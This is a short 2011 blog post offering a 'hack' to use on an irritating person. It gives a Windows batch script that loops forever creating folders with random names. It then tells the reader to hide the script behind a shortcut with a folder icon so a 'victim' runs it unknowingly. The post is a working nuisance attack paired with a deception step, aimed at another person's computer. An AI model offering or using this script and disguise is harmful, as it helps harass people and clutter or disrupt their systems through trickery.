This blog contains Interesting Computer Knowledge.

Friday 9 December, 2011

Deadly and Painful Hacks That You Should Never Try on Your PC


If you are not a computer professional, don’t read this, even if you do. Don’t ever try this on any of your computers. Trying any of these are really painful and will take you a lot of time to recover.If you got somebody really irritating in your life and stalking you every once in a while then this is the right post for you.

Create more than 3,000 folders under a minute.

Step 1) Open your notepad and type the following code.

@echo off
:top
md %random%
goto top


Step 2) Save it as 1000.bat
@echo off makes your screen appear blank but it is actually making hundreds of folders.
md %random% is command that creating folders with random names.( md is a command to make directory in ms-dos)
goto top – return the command to :top, causes an infinite loop.
Now this might look a little suspicious to your victims. Lets make it more funny so that your victim can fall into your trap easily.Create a shortcut for the created batch-file and change its icon to a folder icon and make it look unsuspicious.











No comments:

Post a Comment